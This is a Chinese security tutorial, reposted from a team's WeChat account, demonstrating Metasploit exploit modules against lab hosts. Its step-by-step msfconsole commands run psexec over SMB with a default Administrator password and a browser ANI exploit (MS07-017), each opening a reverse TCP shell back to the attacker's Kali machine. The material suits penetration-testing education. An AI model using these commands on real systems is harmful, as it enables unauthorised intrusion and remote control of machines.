metasploit framework——exploit模块
前言
本节学习exploit模块
1、active exploit
攻击者主动向目标机发起exploit
service postgresql start #启动数据库
msfconsole #启动msf
msf > use exploit/windows/smb/psexec #用这个exploit
msf exploit(psexec) > show options #查看
msf exploit(psexec) > set RHOST 192.168.1.114 #目标机win2003
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp #选择payload,反弹shell
msf exploit(psexec) > set LHOST 192.168.1.113 #kali
msf exploit(psexec) > set LPORT 4444 #端口
msf exploit(psexec) > set SMBUSER Administrator #账户
msf exploit(psexec) > set SMBPASS 123456 #密码
msf exploit(psexec) > exploit
2、passive exploit
目标机访问服务器,服务器上的利用漏洞代码返回目标机
msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
msf exploit(ms07_017_ani_loadimage_chunksize) > set URIPATH /
msf exploit(ms07_017_ani_loadimage_chunksize) > set SRVHOST 192.168.1.113
msf exploit(ms07_017_ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
msf exploit(ms07_017_ani_loadimage_chunksize) > set EXITFUNC thread
msf exploit(ms07_017_ani_loadimage_chunksize) > set LHOST 192.168.1.113
msf exploit(ms07_017_ani_loadimage_chunksize) > set LPORT 4444
msf exploit(ms07_017_ani_loadimage_chunksize) > exploit
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1 #打开反弹过来的shell
结语
主要就是寻找合适的插件,设置,使用
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。
© Honker Security Commando
原文始发于微信公众号(中龙 红客突击队):metasploit framework——exploit模块
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论